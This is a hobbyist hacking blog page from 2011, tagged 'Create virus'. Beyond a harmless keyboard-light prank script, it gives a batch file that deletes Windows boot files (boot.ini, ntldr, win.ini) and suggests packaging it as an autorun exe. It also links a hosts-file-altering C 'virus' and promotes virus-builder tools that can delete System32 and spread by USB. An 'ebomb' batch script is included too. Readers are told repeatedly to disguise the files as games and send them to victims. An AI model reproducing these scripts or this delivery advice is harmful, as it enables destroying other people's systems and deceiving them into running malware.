Showing posts with label Create virus. Show all posts
Showing posts with label Create virus. Show all posts

Make Your Keyboard Light Blink

Monday, August 15, 2011

Want to see your keyboard light blinking constantly like a disco??
If yes, this is for you.

1st open your notepad

just copy and paste the code written below:-

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"
loop


Now go to file then save as and then give any name you want with vbs extension.
means :- whatevername.vbs


Then it should create a vbs script file.
Double click on it.
Now see the keyboard lights(NUM lock,CAPS lock,SCROLL lock)
It starts blinking.

Here is a another script it blinks another style.
Do as above but now paste this code:-


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


save it as anyname.vbs like above
and double click the vbs filee to see the another style

NOTE:- To stop this go to task manager then processes and find wscript.exe
end that process. it stops blinking.

Create your own virus with JPS VIRUS MAKER 3.0

JPS VIRUS MAKER 3.0


JPS VIRUS MAKER 3.0
This is a nice tool for creating your own virus. Select all options you want with your virus and then click on create Virus. It will create an effective virus. There are many options which your your virus will do on victims computer system. Your virus will able to hide itself from process list and it will disable many windows functions.


But be sure not to run in your computer. 
This is only for educational purpose. Please do not use it to harm any other.

Download Here:

Create a virus to block websites

How to create a virus to block websites


Today i am going to write a post on a simple virus written in C. It will block websites on your computer system. This C code is only the implementation of my previous post How to block a website without any software 
I am implementing that process by a C program to create it as a virus. Once the virus is clicked, it will block the some specific websites on victim's computer. The website which you want to block is mentioned in the source code of the program. Change the list according to your choice.


Download source code of Virus Here:
http://www.ziddu.com/downloadlink/13612130/Virus.rar


How to use:

  • You need to have a C compiler for that.
  • Compile and build the C program and generate the EXE file.
  • Run the EXE on your computer to check it's working. 
  • Go to the browser and try to open google or facebook. ;)
  • to unblock those websites. try the procedure given in my older post How to block a website without any software and delete the new entries in the file hosts created by this virus.
  • Now send this EXE to the victim as a game or any other software.


THIS IS FOR EDUCATIONAL PURPOSE. PLEASE DO NOT USE THIS TO HARM ANYONE

Create your own Virus using V-Maker


Today i am going to post about a virus creating tool. This tool is Virus Matic 2010 or in short V-Maker


Main Feature of V-Maker


You can create your own prank files/viruses with ease by V-Maker.

  1. Disable Mouse and Keyboard
  2. Disable Regedit
  3. Delete System32
  4. Block Site
  5. Disable Task Manager
  6. Take Screen Shot Of Victim  PC
  7. Message Box (When User Click on Virus)
  8. Automatically Download Start (When User click on virus download start automatic)
  9. USB Spread


Download Here:

Batch File Virus (a simple virus for windows)

Thursday, August 11, 2011

I assume you know the basic about batch files before reading this post. Batch files are used to run a dos command without opening command prompt window. You can run many dos commands using a single batch file. For this you have to learn how to write a batch file. I am not going to tell you how to make a batch file. If you don’t know how to write, try to learn it from anywhere else. This post will show you some batch files which can corrupt your window. You can also say that these batch files can work like a virus. So be careful and not to try in your computer.




  • Autoexec.bat
  • Ntldr
  • Boot.ini
  • Win.ini
These files are very important and necessary for any windows operating system. So if you want to corrupt windows of a person you have to delete these four files from the computer.
@echo off 
attrib -r -s -h c:\autoexec.bat 
del c:\autoexec.bat 
attrib -r -s -h c:\boot.ini 
del c:\boot.ini 
attrib -r -s -h c:\ntldr 
del c:\ntldr 
attrib -r -s -h c:\windows\win.ini 
del c:\windows\win.ini 

save this code as winVirus.bat.

If you want to make it more harmful, make its exe using bat_to_exe converter and make an autorun disk of it. When someone use the disk autorun will execute itself and command will generated by batch file will corrupt the windows.

Ebomb a virus for fun

Wednesday, August 10, 2011

This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type

@echo off
start iexplore
start notepad
start firefox

and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)


you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "www.http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D

(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad
start iexplore "http://sh3ll-h4ck3r.blogspot.com"
start firefox "http://sh3ll-h4ck3r.blogspot.com"
start notepad


and then simply save it as "anyname.bat"

Note : The only way to get out of any ebomb attack is simply by System restart



please comment below if this post is useful for you..
:)
 
Support : Creating Website
Copyright © 2012. Your Unofficial Guide - All Rights Reserved
Proudly powered by Blogger